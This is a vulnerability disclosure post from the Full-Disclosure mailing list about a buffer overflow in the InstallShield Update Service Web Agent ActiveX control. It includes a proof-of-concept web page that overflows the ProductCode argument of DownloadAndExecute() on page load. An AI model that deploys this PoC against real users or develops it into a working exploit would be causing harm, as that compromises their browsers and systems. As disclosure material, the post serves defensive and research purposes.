The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an
exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute()
function. This object is marked safe for scripting. Note that this issue appears to different
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that
issue fixes this issue as well since the update renders this object unsafe for scripting.
PoC as follows:

-----------------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
   function Check() {
     var s = 'A';

    while (s.length <= 12000) s = s + 'A';

    obj.Initialize("", "", "", "");
    obj.DownloadAndExecute("", s, 0, "", "");
  
   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"
/>
</object>
</body>
</html> 
-----------------------


Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/